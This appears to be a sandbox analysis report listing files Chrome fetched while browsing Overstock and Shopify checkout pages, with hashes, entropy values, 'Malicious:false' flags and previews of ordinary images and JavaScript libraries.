                                                                                                                                                                                    SHA-256:CE4293A8538F5A128FB66ED809BB7FDD7BA922A9384B1AC9CD36D861632AADF2
                                                                                                                                                                                    SHA-512:35735A851B049C652909846CDFF4F2699047DE6960E9FB14C8B80517B04ED6C80BF89C979181C689794A265E548E9F2A80E75CA7B353E2A4EA0313466BED7CA9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_252bb911-139a-473b-833e-5ccc9380aa30.jpg?v=1729325323&width=80
                                                                                                                                                                                    Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@.........................................8iinf..........infe........av01.....infe........Exif.....iprp....ipco....colrrICC....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.............av1C........ispe.......P...P....pixi............ipma...................iref........cdsc..........mdat........d...B2.....@.!...I.....s.t..-".4..Z.ZX...<..+....:.I.d.F#X.R..=ej.........J...H....l.){..I........"..Sj.$..!i..fE.......V.........o..i...)...bs.]$>...`...]...S...y...,....f.)C...-qc.]...]G.g..8A.sy.........j..ZF....^7dZ..t.8."n
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):163
                                                                                                                                                                                    Entropy (8bit):5.335116588616875
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:US9i3USqmKcDXRvFqMPfFQTcZ+1RyUFvNFBIADNHG2JCYWAJDE2JCn+9VRNkTSQ1:UXUoKf8fFGpbdvvB91DMKM+3rkGtSH42
                                                                                                                                                                                    MD5:B37ADEFE65A46E831684783E83EDAEF9
                                                                                                                                                                                    SHA1:CF24CBDE1D7CFE1773CE1F0131973DB90F72B0CA
                                                                                                                                                                                    SHA-256:E4038D5B0B549B4FE73AC5450618E0B45AC1251CE9980DF6BDCDB61A43BA6140
                                                                                                                                                                                    SHA-512:5A975DD2A54EB951930275876CDF35D1DB3237B312B6C52988BAB9897BBA2587585025BC42C6B1E79F52560A1D843913BB5F15E3DD6A6DE5B9CC7C4F4632F996
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */."use strict";(self.pwrClg=self.pwrClg||[]).push([[760],{52760:(s,l,r)=>{r.r(l)}}]);
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):163
                                                                                                                                                                                    Entropy (8bit):5.297552459436421
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:US9i3USqmKcDXRvFqMPfFQTcZ+1RyUFvNFBIADNHG2JCYWAJDE2JCn+9VRNiWTEc:UXUoKf8fFGpbdvvB91DMKM+3riWwM9I2
                                                                                                                                                                                    MD5:3FFE69064BB323E26EBDDE40AECB8628
                                                                                                                                                                                    SHA1:A5E4370DD1416A345A2F41148BE5B67893C96A7A
                                                                                                                                                                                    SHA-256:FF99032B0E0EC65E9A0B4800B2A497F77556908A10D1458CB2C2DC0D458C3F2A
                                                                                                                                                                                    SHA-512:61F521E411637D77D7EE56AFCB75DCC2716D65C0E2C14FA3AFE589C7CF94496B19D1587A8EF89A3F6C344978E74CF74FF3C6A8960E16D1A9065CD55864E152F1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */."use strict";(self.pwrClg=self.pwrClg||[]).push([[136],{60136:(s,l,r)=>{r.r(l)}}]);
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (32944)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):83040
                                                                                                                                                                                    Entropy (8bit):5.470566629097824
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:IT/J8/f3Ke4pPE6TQoxfJUEI4wYC4Pl12dpAIjVWmmdUhd2bi:ITR8/f3l4m4tPL2fvWmmBO
                                                                                                                                                                                    MD5:8601A9EA53CF352C718A9F4D646085BC
                                                                                                                                                                                    SHA1:40466015DAE2BF248191BDBBACEF450162BAD633
                                                                                                                                                                                    SHA-256:F620ED1A82D4DF4BEA16168DEC3D569E0F62CDF25597E502314F10BE4BC1725D
                                                                                                                                                                                    SHA-512:C8C588C063F761F8AC0EA5168CDA67B52DE712AFE74E57D480C5774C5F72DAA2AA6FFF39A28A249B3BAC6AA594D446F9931A2D1CED93DBDF2511179E9B034A0C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/index.BImg1G4g.js
                                                                                                                                                                                    Preview:import{ei as _t,ej as Et,q as B,kW as Oe,T as X,y as z,A as Y,ae as st,a as x,ab as kt,h as et,bJ as Le,w as te,kX as Pe,kY as rn,dJ as sn,kZ as an,k_ as he,k$ as cn,l0 as ln,l1 as un,_ as I,l2 as dn,l3 as fn,l4 as me,l5 as Yt,ac as Dt}from"./app.DfgMZONA.js";const Ie=_t({autoOpened:!1,dispatch:()=>{throw new Error("Invalid attempt to call dispatch outside of AuthorizeStateProvider")},loaded:!1,modalDismissable:!1,modalVisible:!1,sessionDetected:!1}),se=()=>Et(Ie),Me=_t({client:void 0,leaveBreadcrumb:()=>{throw new Error("Invalid attempt to call leaveBreadcrumb outside of context.")},notify:()=>{throw new Error("Invalid attempt to call notify outside of context.")}}),St=()=>{const t=Et(Me);if(!t)throw new Error("Invalid attempt to use useBugsnag outside of BugsnagProvider.");return t},pn={analyticsData:{analyticsTraceId:""},getTrekkieAttributes:async()=>Promise.resolve({}),produceMonorailEvent:()=>{throw new Error("Invalid attempt to call produceMonorailEvent outside of context.")},tra
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (48897)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1672817
                                                                                                                                                                                    Entropy (8bit):5.475916048157043
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:49152:KRS3E0mVgrwaePOfov3p1yaDPXhLqDSa3ou58RsetRs4Obnmyc1wHdcVllfZzutb:KJDPz0
                                                                                                                                                                                    MD5:71DACA80240EA89B5C4A7CC782839E8D
                                                                                                                                                                                    SHA1:55BCE7C559EB7A388ABF84D148B1A3B78227BE25
                                                                                                                                                                                    SHA-256:07C38C0C03EBEF05E359764886B3629BEF1073F114F0F359BE751C987EEC1F7F
                                                                                                                                                                                    SHA-512:FCC0626EDF47380E4628A5628D7680A3F01D7E3045C7696C84A44A1DFB7335EDDEF55AE695EDA0D4705B4BDA65B11187BA7C8953C700D512C7D413A80F1AC71F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/app.DfgMZONA.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["Assistant.BcSSlj7O.js","assets/Assistant.PVhJuO-T.css","component-PhoneNumberFormatter.BKmbVPc7.js","getCountryCallingCode.CIAGUJN6.js","index.CYmXWMTL.js","actions.D__Kux7b.js","graphql-utilities.BTIPFCNt.js","CheckoutEditorBridge.CamOCnXl.js","LegacyVaultedShippingMethods.CLlWtWZU.js","Rollup.B0QeYKuB.js","assets/Rollup.o9Mx-fKL.css","SubscriptionPriceBreakdown.CxrCP-xw.js","assets/SubscriptionPriceBreakdown.Bqs0s4oM.css","component-ProfilePreviewBar.CnWnydkS.js","assets/ProfilePreviewBar.CqJK7U9e.css","ActiveInspector.DQLiU2o-.js","assets/ActiveInspector.DvJo1XKD.css","component-AutocompleteField.B_dNnvGT.js","hooks.CJ9fMJ3B.js","assets/AutocompleteField.x0LibsMb.css","component-ShippingGroupsSummary.2Gt3Vygr.js","StackedMerchandisePreview.JyjIicj-.js","assets/StackedMerchandisePreview._xnAOXmq.css","useAmazonContact.ysZ2sjoF.js","assets/useAmazonContact.D-Ox6Dnf.css","component-Throttle.Blurq3vs.js","assets/Throttle.BA0bvilx
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                    Entropy (8bit):3.0950611313667666
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                    MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                    SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                    SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                    SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):23130
                                                                                                                                                                                    Entropy (8bit):7.969764672688232
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:UrY6DJeZ2khpjml3AFhbhvxVY0zuANnRyd6dTsEmOJp2j1aS:R6DJeZxNml3GhvT9rEdCTdgjL
                                                                                                                                                                                    MD5:2D6E95A81B0F878A633B2D9ECD47867D
                                                                                                                                                                                    SHA1:A07F4C46AF6C9383FC831A6B415FBFD75E8EBB0A
                                                                                                                                                                                    SHA-256:56F78EA34488C403551FEE586435F571F538213D61BF1A522FAD3507802235B6
                                                                                                                                                                                    SHA-512:246601730F5EA9CFA888C89A3302ADF696F2259C4BFB84A5D96AA266296AC1C3A06CEA029D545918232FBC11D23A14849F8FF162C20856471F887C45C9B5E366
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/collections/Fickle-Cream-Boucle-2-Piece-Modular-RAF-Sofa.jpg?v=1710949913&width=320
                                                                                                                                                                                    Preview:RIFFRZ..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .W.......*@.@.>9..C.!....h ....i..=P4..#._.....8.g............^.?.=Y.`.K........Y..................P....}r=L...........7...?.+......l......=@?.kL......m.....?.......x.._2>...G.....?...............:.U.....Y...........}...........I...s.o..._..............?.?....................?.~....[..._...>....l...+...W....~^.x....~...<..R..v....bb..L.P.L.,....L5Se............'S._.n.d.SSW"V>c..:Gj.PK..!."...O~Hv...t.l..f.CH<.L=.."^bk0LRm...0.>n.......Y.K.F.AX..^.C5h.t.B.z[!...3w.._AB.......|_....<......:D...,Q2...|uzn.....l.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1458
                                                                                                                                                                                    Entropy (8bit):6.622511057524393
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:sTCIl/X2YlXWI2PUeG32ydAv2VtvtxCzwFy507I6F6kBs6E:5Il/XflE72j/CzwFy5Ec+E
                                                                                                                                                                                    MD5:3C10EA45612AA920B71B1F38D17DA3E3
                                                                                                                                                                                    SHA1:925D6E917D6D3ADA327543514CC34AAFB38266D6
                                                                                                                                                                                    SHA-256:F5BDB9A81E73683D6763211C9758B1FDEC24AE78822D2BFE6CE4F2518E79A36C
                                                                                                                                                                                    SHA-512:8E069B0EDDF60C43C30DCD4CEA2D1F561842230564919113D4563D5B79E7394D4CE3098A2002F5633B315DC0907322923FC9CA10F5AA6986D56E2E5CFA3A9330
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_e7c4ed7e-ca97-48e2-990d-05a8b487039f.jpg?v=1729322909&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!!.... ....h..#......'..7..>........W.T."L`q........W.s.h.GtY.G.`6..V$S..w..:.a,. ...,.."..Q......:..?......Cn......YO/.H..3O/_....6.f.[-h.v.o....sC..#...'.....lU...(+...u...l.E!...qw]).....W...]...._.f...`..OQ....Z~...Qk-*..D#......K7Z.z#..~j^N..^+P.`."........ts$3#..2..6.a..'.x..d....W.?Z.r.......d|../..P..q....f....(....c]....p......%.O...`..@.W.q'.:.}l.df..Y...S...~i..e......0v..A..MMF.."n..)...gilc.&....G7.\;.+...W_`..e.|..aB..|*....T4.....b00..9.....x..T.)w......%KU.x....~...N..KWV]i.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (37527)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):201423
                                                                                                                                                                                    Entropy (8bit):5.373316699708943
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:oo7S1quXuTXPKS/7fkEhwHT5AZBx6YrJyu/q0Q:9kMPXOlaU
                                                                                                                                                                                    MD5:19491F0C4D32C12CC5AAA98EC8E10405
                                                                                                                                                                                    SHA1:110895977013DBBF605DEE5339E9EDF2309AACE3
                                                                                                                                                                                    SHA-256:CFFB90C03302362D87D681DBD3DC38B9E11681831DB007351AEFA7BBD1E0D223
                                                                                                                                                                                    SHA-512:0594F28AFA6DEE66BCC7E7B43BD01A87013578D15C80797BF6A3B49316A4868679C028B260A9201EEE412E19CE579A585866445E7CF9C419D699805A24D7B5FB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:function bu(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}var Mc={exports:{}},li={},Ic={exports:{}},V={};/**.* @license React.* react.production.min.js.*.* Copyright (c) Facebook, Inc. and its affiliates..*.* This source code is licensed under the MIT license found in the.* LICENSE file in the root directory of this source tree..*/var $l=Symbol.for("react.element"),fp=Symbol.for("react.portal"),dp=Symbol.for("react.fragment"),pp=Symbol.for("react.strict_mode"),mp=Symbol.for("react.profiler"),hp=Symbol.for("react.provider"),vp=Symbol.for("react.context"),yp=Symbol.for("react.forward_ref"),gp=Symbol.for("react.suspense"),wp=Symbol.for("react.memo"),Sp=Symbol.for("react.lazy"),na=Symbol.iterator;function Ep(e){return e===null||typeof e!="object"?null:(e=na&&e[na]||e["@@iterator"],typeof e=="function"?e:null)}var zc={isMounted:function(){return!1},enqueueForceUpdate:function(){},enqueueReplaceState:function(){},enqueueSetState:function(){}},Fc=Obj
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (32016)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):352958
                                                                                                                                                                                    Entropy (8bit):5.426988888464076
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:KBUQDNe0coewf3a98HrZhJ5ltUMGNq0ktTwPKa:KFDiojfWjzkI
                                                                                                                                                                                    MD5:91FCFF73FA1CD20E230ED06DE8A5EB3F
                                                                                                                                                                                    SHA1:DC2D791A00139FCBA44C38849E9140527A386986
                                                                                                                                                                                    SHA-256:56AB8DF09F1AC92EDE6F4ABAAB9E425F687B41EDBCFC272AC4D5912CE488BB7B
                                                                                                                                                                                    SHA-512:377F08C465EB87F0F2A8277F2E1DF67299D7AFC740BAE548E8734797489A884C654EE9005DE5F383771268D41E9F62E084D6F972CC906B0DBCA50028DE11CCBF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=function(a,b){b=b||window;for(var c=0;c<this.length;c++)a.call(b,this[c],c,this)}),Array.prototype.includes||Object.defineProperty(Array.prototype,"includes",{value:function(a,b){function c(a,b){return a===b||"number"==typeof a&&"number"==typeof b&&isNaN(a)&&isNaN(b)}if(null==this)throw new TypeError('"this" is null or not defined');var d=Object(this),e=d.length>>>0;if(0===e)return!1;for(var f=0|b,g=Math.max(f>=0?f:e-Math.abs(f),0);g<e;){if(c(d[g],a))return!0;g++}return!1}}),function(a,b){"use strict";function c(a){this.time=a.time,this.target=a.target,this.rootBounds=a.rootBounds,this.boundingClientRect=a.boundingClientRect,this.intersectionRect=a.intersectionRect||k(),this.isIntersecting=!!a.intersectionRect;var b=this.boundingClientRect,c=b.width*b.height,d=this.intersectionRect,e=d.width*d.height;c?this.intersectionRatio=Number((e/c).toFixed(4)):this.intersectionRatio=this.isIntersecting?1:0}function d(a,b){v
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                    Entropy (8bit):3.875
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H+uZYn:euZYn
                                                                                                                                                                                    MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                    SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                    SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                    SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSEAl-ATzxeZtGaBIFDZFhlU4=?alt=proto
                                                                                                                                                                                    Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):69039
                                                                                                                                                                                    Entropy (8bit):5.322266718661162
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:RJeUwT7hpwPCHM9ZVK01QYTZ02LKVsdmpyKcicxWozdeU8Dy0ppg+zIej8vDV7TV:RIT7Vs9ZVKBYj8wKcHx1
                                                                                                                                                                                    MD5:A89FBA887C255E2C6FA1453315584CE6
                                                                                                                                                                                    SHA1:D88D809A4FEBB3437870C8C60FC3D225B1F43A9C
                                                                                                                                                                                    SHA-256:0EA42596F214C16CAFCDE24BA309BDAB88BAD29CBD49BA547D219B39A25CCE32
                                                                                                                                                                                    SHA-512:D79E11E2080F8742B2D0E82D9577D670C4D38D5E1894050A23A0BCA427A347F15BD2B602AAAC676E89A9722B1D30DA57C90B4351DC4EDDD8BB23C5D9AA100A08
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1455
                                                                                                                                                                                    Entropy (8bit):6.009327618604725
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZAS7vd8BMRFXyfO7lPssOBxbnbpyskNkmh3:NBIl/XflVxWSMsFXrlP1ezb0skNkW3
                                                                                                                                                                                    MD5:FEC35F8471A81D68AF976EDA8DB5E01C
                                                                                                                                                                                    SHA1:844ECA46116C8B51862C8114A360C6C2B243BE58
                                                                                                                                                                                    SHA-256:63FE06FCA26E35DB95D463B7E142AB8F352C8768FB22671CE43976DEAD6B720A
                                                                                                                                                                                    SHA-512:4D79AD38A55BE6AD257DEC43E206F1460E979BF3A04A36BD5A3966587FF555F35F3D9DB2E50390004585F9601D6F149D207EAB2A95E5D97003860E147D8C7D2C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..........................................................................,............@...f&F.21!...'....#S....:................./........................!1.AQq"2...#@Sa.B............?... .=2)..#b.<..f..3.F,.......28
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (45593)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):208669
                                                                                                                                                                                    Entropy (8bit):5.434588350112003
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:D4KDveMUnt96samwiHcv87FjDJ7j1R4pCkOGrg:Fe7BamwiHcv87/j84kOGU
                                                                                                                                                                                    MD5:E4A59A6A4ACC60B3E36258E1D6CCAAC5
                                                                                                                                                                                    SHA1:774A04F47382E6E811F4A7EDA0492822FFBA964D
                                                                                                                                                                                    SHA-256:5DC9257237C5C519DB2B4F1BCED9B638FBEE12EE46163FC02CF6B77EFB793379
                                                                                                                                                                                    SHA-512:002B258870ADD9BB27185AAFC133249785CE22976645C5DBEDBC6AFD015FB950DA81C4672A508C76CBC9D92688E592421CD687227FA29382D1EC9D0FCF4621F0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[714],{7228:function(e){e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n},e.exports.__esModule=!0,e.exports.default=e.exports},2858:function(e){e.exports=function(e){if(Array.isArray(e))return e},e.exports.__esModule=!0,e.exports.default=e.exports},3646:function(e,t,r){var n=r(7228);e.exports=function(e){if(Array.isArray(e))return n(e)},e.exports.__esModule=!0,e.exports.default=e.exports},8926:function(e){function t(e,t,r,n,i,o,s){try{var a=e[o](s),u=a.value}catch(e){return void r(e)}a.done?t(u):Promise.resolve(u).then(n,i)}e.exports=function(e){return function(){var r=this,n=arguments;return new Promise((function(i,o){var s=e.apply(r,n);function a(e){t(s,i,o,a,u,"next",e)}function u(e){t(s,i,o,a,u,"throw",e)}a(void 0)}))}},e.exports.__esModule=!0,e.exports.default=e.exports},9713:function(e){e.exports=function(e,t,r){return t in e?Object.defineProp
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2175
                                                                                                                                                                                    Entropy (8bit):4.196647615052
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NqwlRmJTwgqeETa0UIZQskxfzmSiDlOH1LAvpbw/Gj:NPmBoUIasEfzmZDlc1MvpXj
                                                                                                                                                                                    MD5:3C5C4CDA8B10AA6D074321D08486D33C
                                                                                                                                                                                    SHA1:00D96B268B9E3EC3C463EB563A5D2C5CADD296AB
                                                                                                                                                                                    SHA-256:ED7C5A2B773F353E27C8CF3CBC71EA44E75EDB6F82B8A7FA5E6DB4FC140212CD
                                                                                                                                                                                    SHA-512:99B05E73C2FBD7D3711EE38EBFEB2EFCD912E0F2BCD6A3BB85388522EED7A11309135964443AD7D501DA25CE020F8F567EF8391706D7B5AA1184FF78B77AF2F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/BBB_EmailCouponIcon_07252023.svg
                                                                                                                                                                                    Preview:<svg width="48" height="49" viewBox="0 0 48 49" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M45.4611 17.6983V45.2258C45.4611 46.2346 44.6433 47.0523 43.6346 47.0523V47.0523M45.4611 17.6983L40.2426 13.654M45.4611 17.6983L40.2426 22.1878M40.2426 13.654V9.21831C40.2426 8.06548 39.308 7.13092 38.1552 7.13092H32.1539M40.2426 13.654V22.1878M32.1539 7.13092L25.2267 1.74304C24.4681 1.15306 23.4048 1.15719 22.6508 1.75305L15.8462 7.13092M32.1539 7.13092H15.8462M15.8462 7.13092H9.84494C8.6921 7.13092 7.75754 8.06548 7.75754 9.21831V13.654M7.75754 13.654L2.53906 17.6983M7.75754 13.654V22.1878M2.53906 17.6983V45.3563C2.53906 46.293 3.29839 47.0523 4.23507 47.0523V47.0523M2.53906 17.6983L7.75754 22.1878M4.23507 47.0523L20.2819 32.7244M4.23507 47.0523H43.6346M20.2819 32.7244L22.6323 34.5564C23.3956 35.1514 24.4679 35.1436 25.2225 34.5376L27.4803 32.7244M20.2819 32.7244L7.75754 22.1878M27.4803 32.7244L43.6346 47.0523M27.4803 32.7244L40.2426 22.1878" stroke="#2F3337" stroke-width="2.08889
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):18
                                                                                                                                                                                    Entropy (8bit):3.4193819456463714
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YAsf4:YAsQ
                                                                                                                                                                                    MD5:C07FE8D0C031632D49B937F7B64CC318
                                                                                                                                                                                    SHA1:B50FF5D4241ED1D437505098707C289683F62ACF
                                                                                                                                                                                    SHA-256:9B5179EA2A77FE69B294FBD2ED504EACBFBE048EDE58967B43AF2CA537144B1F
                                                                                                                                                                                    SHA-512:394C5DA339B99343711A35BCF088CB6EA5E93462616B6E5A2085182F55B63206ADA99E4A429B332170F958F2ACBEB57B9623AF1B96CEA288E34BCDE693541723
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://shop.app/pay/session?v=1&token=7e6ace58-e4f6-4d35-ad5a-a7fc4b96b996&shop_id=63371051167
                                                                                                                                                                                    Preview:{"eligible":false}
